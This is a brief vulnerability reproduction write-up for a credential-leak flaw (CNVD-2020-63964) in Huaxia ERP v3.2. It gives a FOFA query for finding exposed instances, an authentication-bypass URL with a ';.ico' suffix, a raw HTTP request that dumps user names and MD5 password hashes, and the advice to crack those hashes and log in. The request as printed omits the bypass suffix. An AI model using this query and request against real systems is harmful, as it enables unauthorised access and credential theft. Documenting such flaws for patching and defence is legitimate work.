Article directory
Huaxia ERP has leaked user name and password sensitive vulnerabilities (CNVD-2020-63964)
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Introduction to Huaxia ERP
WeChat official account search: Nanfeng Vulnerability Reappearance Library
This article was first published on the Nanfeng Vulnerability Reproduction Library official account
Based on the SpringBoot framework and SaaS model, Huaxia ERP is determined to provide open source and easy-to-use ERP software for small and medium-sized enterprises. Currently, it focuses on invoicing + financial functions.
2. Vulnerability description
Based on the SpringBoot framework and SaaS model, Huaxia ERP is determined to provide open source and easy-to-use ERP software for small and medium-sized enterprises. Currently, it focuses on invoicing + financial functions. There is a sensitive information vulnerability in the Huaxia ERP system, which can be exploited by attackers to obtain sensitive information.
CVE number:
CNNVD number:
CNVD number: CNVD-2020-63964
3. Affect the version
Huaxia ERP v3.2
4. fofa query statement
“jshERP-boot”
5. Vulnerability recurrence
Vulnerability link: http://127.0.0.1/jshERP-boot/user/getAllList;.ico
vulnerability data package:
GET /jshERP-boot/user/getAllList HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
The password is encrypted by md5, and you can log in to the background after decrypting it
6.POC&EXP
Follow the public account Nanfeng Vulnerability Reproduction Library and reply Vulnerability Reproduction 36 to get the download address of the POC tool:
7. Rectification opinions
The manufacturer has not yet provided a repair solution, please pay attention to the update of the manufacturer's homepage: https://gitee.com/jishenghua/JSH_ERP